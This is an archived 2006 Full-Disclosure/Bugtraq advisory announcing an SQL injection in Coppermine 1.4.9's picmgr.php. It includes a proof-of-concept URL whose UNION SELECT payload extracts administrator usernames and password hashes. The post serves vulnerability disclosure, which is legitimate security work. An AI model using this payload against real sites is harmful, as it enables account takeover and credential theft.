[<prev] [next>] [day] [month] [year] [list]
Message-ID: <b47a94630610271209u44f38ba5x25cbc5f0b81aa04@mail.gmail.com>
Date: Fri, 27 Oct 2006 14:09:01 -0500
From: disfigure <disfigure@...il.com>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: Coppermine 1.4.9 SQL injection
/****************************************/
http://www.w4cking.com
CREDIT:
w4ck1ng.com
PRODUCT:
Coppermine 1.4.9
http://coppermine-gallery.net/
VULNERABILITY:
SQL Injection
NOTES:
- SQL injection can be used to obtain password hash
- You must be a registered user to access the vulnerable page, picmgr.php.
- The table prefix must be known.
POC:
<victim>/picmgr.php?aid=123%20UNION%20SELECT%20user_id,user_group,concat(user_name,char(58,58),user_password)%20FROM%20cpg149_users%20right%20join%20cpg149_usergroups%20on%20cpg149_users.user_group%20=%20cpg149_usergroups.group_id%20where%20cpg149_usergroups.has_admin_access%20=%201%20--
ADVISORY & EXPLOIT (requires registration):
http://www.w4ck1ng.com/board/showthread.php?t=1856
/****************************************/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists